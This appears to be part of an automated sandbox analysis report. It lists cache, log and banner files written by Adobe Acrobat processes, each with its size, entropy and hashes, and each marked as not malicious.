SHA1: | 37FE768F7FBDFAACFCD5C4B9381375F51A126EB8 |
SHA-256: | EF47D5D9438BD2ADB6F9ACA56CCFD46CB941B0C80EB80D3329032B10C4BDF504 |
SHA-512: | 1F9101AE7DF747A9347E93297F7033C83B54F4889D34423BBE4B30D01BFAE27BA945E5110DD88BB0124C240F55F7FD9B745ACBCFA416438D9E4AB9DECDF3D931 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.20471012356139 |
Encrypted: | false |
SSDEEP: | 6:iO4s4K39+q2Pwkn2nKuAl9OmbnIFUtSs4qJZmwss4q9VkwOwkn2nKuAl9OmbjLJ:7z4K34vYfHAahFUtp4qJ/34qD5JfHAae |
MD5: | 9C7645DEB8D23BDE847F87F72F5C5311 |
SHA1: | 922E0E97954EBBB7D7F123B3E704DF9283C3973F |
SHA-256: | 17D75478099DB49B2AB6C1B4C9B9815C9928BD078383CEAC2EF1ACCBF75E950D |
SHA-512: | 4C82FCA6DF44B0CF9C409151466CA3F83149A089CB65C8610C867C4DBCF9D1C0690F348FA9ACD47A8F2A21FED9FA887107DE70405703CF7F15455F7229467B82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.20471012356139 |
Encrypted: | false |
SSDEEP: | 6:iO4s4K39+q2Pwkn2nKuAl9OmbnIFUtSs4qJZmwss4q9VkwOwkn2nKuAl9OmbjLJ:7z4K34vYfHAahFUtp4qJ/34qD5JfHAae |
MD5: | 9C7645DEB8D23BDE847F87F72F5C5311 |
SHA1: | 922E0E97954EBBB7D7F123B3E704DF9283C3973F |
SHA-256: | 17D75478099DB49B2AB6C1B4C9B9815C9928BD078383CEAC2EF1ACCBF75E950D |
SHA-512: | 4C82FCA6DF44B0CF9C409151466CA3F83149A089CB65C8610C867C4DBCF9D1C0690F348FA9ACD47A8F2A21FED9FA887107DE70405703CF7F15455F7229467B82 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.161565549792888 |
Encrypted: | false |
SSDEEP: | 6:iO4sqavq2Pwkn2nKuAl9Ombzo2jMGIFUtSs4UOZmwss4UikwOwkn2nKuAl9Ombzz:7zDvYfHAa8uFUtp4UO/34Ui5JfHAa8RJ |
MD5: | CA995AF6E9041A70F039871CD864AA32 |
SHA1: | 7351FBCEE71B0F1F20C66607A60B6661DD785DF7 |
SHA-256: | B693F7DE656E14E85A3FCF7AA4487B0F9CDE2CCE72B3A0EBE5EFE40351BA3251 |
SHA-512: | 257B49E54D305A6DDF739C8607D0191F2375E3B38C6F47D2B78C9DC7B27E847F9B84AE670E0313DDA0313E99C4FF93BF4E63A4B5966F8BF44A2B9D0FCFEC5948 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.161565549792888 |
Encrypted: | false |
SSDEEP: | 6:iO4sqavq2Pwkn2nKuAl9Ombzo2jMGIFUtSs4UOZmwss4UikwOwkn2nKuAl9Ombzz:7zDvYfHAa8uFUtp4UO/34Ui5JfHAa8RJ |
MD5: | CA995AF6E9041A70F039871CD864AA32 |
SHA1: | 7351FBCEE71B0F1F20C66607A60B6661DD785DF7 |
SHA-256: | B693F7DE656E14E85A3FCF7AA4487B0F9CDE2CCE72B3A0EBE5EFE40351BA3251 |
SHA-512: | 257B49E54D305A6DDF739C8607D0191F2375E3B38C6F47D2B78C9DC7B27E847F9B84AE670E0313DDA0313E99C4FF93BF4E63A4B5966F8BF44A2B9D0FCFEC5948 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\14262842-5d4c-47c1-a7a1-ad04dd26647f.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.973815187481089 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPCJIsBdOg2HZcaq3QYiubInP7E4T3y:Y2sRds8C3dMHg3QYhbG7nby |
MD5: | 014CEA0E01588354B9F785E4E28F6421 |
SHA1: | 6B8967FB9CF8992C7E4E619870338FCA49C7A405 |
SHA-256: | 6EB55B982CC0192AE9F611B43343B074C73C65BA9915DF2DF8F6DEAE32538B6D |
SHA-512: | 5E14CDB2CF7EC0A282F14674BFCB378CBA3F2D216BC76A35329E1F89A1913CEAF9C3B0AB3C3BE980BF19C0B52722F3E415C00CAF90E6BE1F48972DFB41B37736 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.973815187481089 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPCJIsBdOg2HZcaq3QYiubInP7E4T3y:Y2sRds8C3dMHg3QYhbG7nby |
MD5: | 014CEA0E01588354B9F785E4E28F6421 |
SHA1: | 6B8967FB9CF8992C7E4E619870338FCA49C7A405 |
SHA-256: | 6EB55B982CC0192AE9F611B43343B074C73C65BA9915DF2DF8F6DEAE32538B6D |
SHA-512: | 5E14CDB2CF7EC0A282F14674BFCB378CBA3F2D216BC76A35329E1F89A1913CEAF9C3B0AB3C3BE980BF19C0B52722F3E415C00CAF90E6BE1F48972DFB41B37736 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4320 |
Entropy (8bit): | 5.256168896929066 |
Encrypted: | false |
SSDEEP: | 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7UlI5SYyG:etJCV4FiN/jTN/2r8Mta02fEhgO73gop |
MD5: | 2018B9ADF909ED97000CC638E085DF6C |
SHA1: | D3AD879394FA96EC3E5E1F77ED5F2D0B7F63AD99 |
SHA-256: | 40FD5880ECD09697A79C41C745499A5C88BEB04F17473599DF06DE64BF403183 |
SHA-512: | F9CBB5072051647A72A38337717B7F39E62E4DA16D0831D68FCB0000380B03EE999D7062067FE5D598D8CA739AF92F7A53C5FCEC8534173677C304F65520E8CE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.1671374016054115 |
Encrypted: | false |
SSDEEP: | 6:iO4s+MGAq2Pwkn2nKuAl9OmbzNMxIFUtSsbZmwssxkwOwkn2nKuAl9OmbzNMFLJ:7z+MvvYfHAa8jFUtpb/3x5JfHAa84J |
MD5: | FB5B6928AB268F61A707C7B2F37C37D0 |
SHA1: | B63D9D4209BD612F021D38FF05AF5281C30813F4 |
SHA-256: | FA6EBCE21B8C515389B89D2FF24B540F03D5E1A674F50752C85A630F3408FB42 |
SHA-512: | 6D4ACA02D2108147443C8858A963C43A852E4CC2512344752DAAB6F7DD69BAA9F4701B189C0BE0217C3558581E5CBACD50DF0E78D08D6B3519AF5FB30BD090CA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.1671374016054115 |
Encrypted: | false |
SSDEEP: | 6:iO4s+MGAq2Pwkn2nKuAl9OmbzNMxIFUtSsbZmwssxkwOwkn2nKuAl9OmbzNMFLJ:7z+MvvYfHAa8jFUtpb/3x5JfHAa84J |
MD5: | FB5B6928AB268F61A707C7B2F37C37D0 |
SHA1: | B63D9D4209BD612F021D38FF05AF5281C30813F4 |
SHA-256: | FA6EBCE21B8C515389B89D2FF24B540F03D5E1A674F50752C85A630F3408FB42 |
SHA-512: | 6D4ACA02D2108147443C8858A963C43A852E4CC2512344752DAAB6F7DD69BAA9F4701B189C0BE0217C3558581E5CBACD50DF0E78D08D6B3519AF5FB30BD090CA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.445225243552231 |
Encrypted: | false |
SSDEEP: | 384:Sepci5tuiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:1Bs3OazzU89UTTgUL |
MD5: | 096F51E3AEFE080B930F5AC38E950C5D |
SHA1: | E4FA4FC79EA1FCB9BDDDE815C62871A2CA51D4CF |
SHA-256: | 8F963B1BEA66D97676BA96F1A2904D4819E35FA09CDA966B312ECDC471F84B4A |
SHA-512: | BD67949711293E2DE3710A2FA7D6D32E0C72E1943767E449BFDE129F4672B6FB97CE7632821D8C84A9C335F867025E4F596BBF2B5772A4070A257E9B783ED30D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.213450136399129 |
Encrypted: | false |
SSDEEP: | 24:7+tRrmnuwKyqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9b:7MEnCyqvmFTIF3XmHjBoGGR+jMz+LhB |
MD5: | 38B64A52C03FE963F32E7C34E2005E04 |
SHA1: | 52977EF6C45E04C39A58C933184872A5C115A3AC |
SHA-256: | 195185AD8FDE8C061FE401ACB117AFBAD82114F98F711A668165881FD32149D5 |
SHA-512: | 7AF29A22595396449245AC1657B51503C8E08E6D416690CE6B7EDCD55600C25CA33E760C5BA65A9356FBDE9F3FC8C5D58F4A5E5BB95DF181A88E4DE5E8AB51F0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFklXXdkPtfllXlE/HT8kgPh/XNNX8RolJuRdxLlGB9lQRYwpDdt:kKdeT8XVNMa8RdWBwRd |
MD5: | 663CB8B38876496086695C688A2CA5B3 |
SHA1: | 3E75F0F4857EBF74A8798A5B180BD2A1D981CB6C |
SHA-256: | EE8CE8A8D591195D48D18F578EEDA62568C22972BE7656CE23E678F2F673630A |
SHA-512: | 6832FA3DDB8707A39A514E8C95FD931A97B48180B2D00447EF8F62FBAC8C582D9BA184420BE7F5D9D57CB9DFC3C94BBD0DC98260B2EAD2D3C1BA299AB1AFE6DC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.364065501083561 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJM3g98kUwPeUkwRe9:YvXKXOlydS2Zc0vLyMGMbLUkee9 |
MD5: | 096F345BCBFD4C885CB2712CF66B3390 |
SHA1: | 67A8689979D38E8202CC8F5D2439167FFB1C503B |
SHA-256: | 389A266824C76D9B054F575F1922DF0B06A5391AD69D3B2069335601538E085D |
SHA-512: | 0B1D892B4B0FEC14F2B9470857C9D23200187088DF8E1BD1D516B0B7C58049BD597041F107002DA56B39F9A6EC1FC0ABE483EC9ADAF7319FA132BA7ED6DF4108 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.313426139569147 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJfBoTfXpnrPeUkwRe9:YvXKXOlydS2Zc0vLyMGWTfXcUkee9 |
MD5: | FAF5791BEE8F9A26224603D79E2B62A2 |
SHA1: | E28F1171A9CD355783447C9FEF06CE2F5BE299AC |
SHA-256: | 18CCA2FFE4BA7199036ACD4DF3494C9EC5DBA82427F0FCD791E85A66A138B563 |
SHA-512: | 1C2B8C03BCF03D58E0EB6485297241743D6316EC8C8ED0BFC0CB611D8C2B14054076059C5D65D8EB14D5AA93B0A34B3A5516A14F09310102A11374C704A0CD63 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.291685634926954 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJfBD2G6UpnrPeUkwRe9:YvXKXOlydS2Zc0vLyMGR22cUkee9 |
MD5: | A007A85EFA0A4D5957FD1C67DE6304B7 |
SHA1: | 598446A0D49287B182EBA2E376D26DDC81B465A3 |
SHA-256: | 49855162C7B2CC01780E6DF027250EAADF720518B6A607EED84CD86618B9D6A3 |
SHA-512: | 4104F8C9D5122C7218202DB3D7C22F792BD09125C9A388266E7B0D5EADC4A317707DF65BB369693E6EDB09C99970176ECECE8AF34C0AF07C39BFF8AF907A19D8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.351100642884558 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJfPmwrPeUkwRe9:YvXKXOlydS2Zc0vLyMGH56Ukee9 |
MD5: | F2009F84F677D23E0B745C06DFB4150B |
SHA1: | EAA57F8F6DD0607272B1F13D2CA8669E9D84E76D |
SHA-256: | DD3683EE9715CF7D9BB66576E226E40FD7ED9D04E7FEC7A0165C19D546702DD2 |
SHA-512: | BD5D2A9EAEFBF5AAF50F52BA668F940E2AB5C69BC53CDD91ECEE66F9B656FAB6E37C6E2755A5D5D8AC8C5C2E0727F8DB96A7F58889A9A653421F2B72E05D341A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.687648951676001 |
Encrypted: | false |
SSDEEP: | 24:Yv6XOJ2zvLepLgE9cQx8LennAvzBvkn0RCmK8czOCCSo:YvdJuKhgy6SAFv5Ah8cv/o |
MD5: | 329E60C7D90905F2297DE1B33560C519 |
SHA1: | C8A71035960CE85D0A4BCF1C3A4A0045A4BE243F |
SHA-256: | D168CA432F9AA8CB74906A88F2CA04E88AB1CCAB95CE5D4314F83151ACAE0C8C |
SHA-512: | 91AD43D05A9D0E3559B272EE9C249998A43A7C63543CE6B1813596DB0F6C5C0B5FDF090F94E013EB7FA1C22C1D68E160D20C43CF146A1F9DEC61A11A69123B3A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.2956576001343825 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJf8dPeUkwRe9:YvXKXOlydS2Zc0vLyMGU8Ukee9 |
MD5: | 0481A9A09DF9B66463870708954971D3 |
SHA1: | A7720CDAFFBA2602691DDAA8FD989388B72855DB |
SHA-256: | 710CA0872B68CDDCE1D8BB984150B544053164C77CDA9C8E0EB022BA69D08EC3 |
SHA-512: | 1B9D198BC5B016E54AF6D30136AABE8C75B8CEA1F42864B9E70401B59686B4892C7008F8F672A8C542F033DE748607E5793C54A3328EEC5BA42491EAB14EE42C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.300459074975354 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJfQ1rPeUkwRe9:YvXKXOlydS2Zc0vLyMGY16Ukee9 |
MD5: | 8C252F3FDEEF7D0527274F54012679C7 |
SHA1: | 48035FF8AD92BCFF5DDE7BDC323D4A1A9BB9FF44 |
SHA-256: | E5C03BAE39268854C59B2AE84ECBB39D1A5F740FF3F1EECA4C0692C5D4831855 |
SHA-512: | 22DE228825AB5019E1669539F73D0A0802AF9F545867EF397B4505E2D1D67AFD509DECF7EE600E90250738D5ACF16FDCBF7ECA81F1317EC9A4589F5EB5D13416 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.304124784813986 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJfFldPeUkwRe9:YvXKXOlydS2Zc0vLyMGz8Ukee9 |
MD5: | D94426E40A1DBC84617664A2CEE5A9F6 |
SHA1: | 40A4E4CAB872A19D5A2DD8CA5F348C9510AEDF26 |
SHA-256: | EBC3802148C94D8CD2F57658C0862A60E44D440527A6A890D59996CBB7BD2EA8 |
SHA-512: | 504AC91EBE843AE2D02EF3B9F855807B85501A2269F31D1D1BA3FBE6AC160BE520D23248443D15986FBC4640F64F6D3D0C6F50B738828F15AADC7FC6A57CCB1C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.321023556885211 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJfzdPeUkwRe9:YvXKXOlydS2Zc0vLyMGb8Ukee9 |
MD5: | 8354748B00BF6B25B475B60959FE9999 |
SHA1: | 782DE88838E6816812B0689E696D2AD9A03283D8 |
SHA-256: | B585867D1E00BA0F0AA46DB87F49E348E27D0301ECA3CF13FA91EB23811F418F |
SHA-512: | 0396DB1B48C5106358B85CAFFD8A9284D55B5F9A7925DCD6C3513C611658622869240F1CEDE863E56054EF5C7328F9357CD36C21DB1101C7F0F5B5A8514E6511 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3022420990824735 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJfYdPeUkwRe9:YvXKXOlydS2Zc0vLyMGg8Ukee9 |
MD5: | 91DFD93618A5281DA5AD9362DD4AA24E |
SHA1: | 840F47112C231E03DEC2D820E14531F08F5E0548 |
SHA-256: | 11040D63D269294F570AF51524885E451616411BFA6B693C7D499694A10E064C |
SHA-512: | 4B8FD3141496929F88928E883950F7D3BE1B80C667E005D293193CFB54107B11218A733766DF3A5DAC45F9D77288627F5977D121757096DD1DD2078183B3C6BF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.288331945480743 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJf+dPeUkwRe9:YvXKXOlydS2Zc0vLyMG28Ukee9 |
MD5: | 2F7A31CD18061E141329148169AA5437 |
SHA1: | 8C32A9EA0839E5EA0C9E8FC2DBDD85063AFB51D2 |
SHA-256: | E8B918E43E8CAC134C28001E665312EF261371244438F5F7B3AF467AAD0DE314 |
SHA-512: | AE2E4D0CE2D89D181F9F6FC62B0D4C6AD737F154DFC3BE454AD7E6D50184502E49E22A3175A0DC5106F18C754D2C67A98EFAF0FE009C24AEDBEDF3872551BEA4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.285773787140649 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJfbPtdPeUkwRe9:YvXKXOlydS2Zc0vLyMGDV8Ukee9 |
MD5: | 87C73E5F538557A2C1219A2F51614C5E |
SHA1: | 4E39C5C27386EDD79DD8B0ACE8D0FB735294D526 |
SHA-256: | F9FE6B76521F38DEB79B708A30ABA4C44125427BE68D0912BEF674FDC9F7A107 |
SHA-512: | 24CC3EB803153423817752180C6B4054F079CA1C0D8C3DD3D203C4F511CA7F482C3165ADC8A32CB7DD9DEF8C619141C268B2E27FB0A9715C6FEF360CEC2BDFD5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.291031550529759 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXWFRlydSHVoZcg1vRcR0YIyjoAvJf21rPeUkwRe9:YvXKXOlydS2Zc0vLyMG+16Ukee9 |
MD5: | 05E9DDAB3FB71E7EB4146E95C5E8F705 |
SHA1: | A8E20CB5396774FD05256BAA2BCE3CE22B3CA29F |
SHA-256: | 64BA83BC0FFEA88571D4994B2A68EB7BC5DBACA1058CA1713AD108505D6D38D9 |
SHA-512: | F90531283CE1C545DF2989FBA9569539B7346AA2C18C3BB1F88742F481D26C410E6CF5BDB57A56CBD86F522FE0BE47147DFDB5815AB2CE7395BD836ED5BFBDA7 |
Malicious: | false |
Preview: |
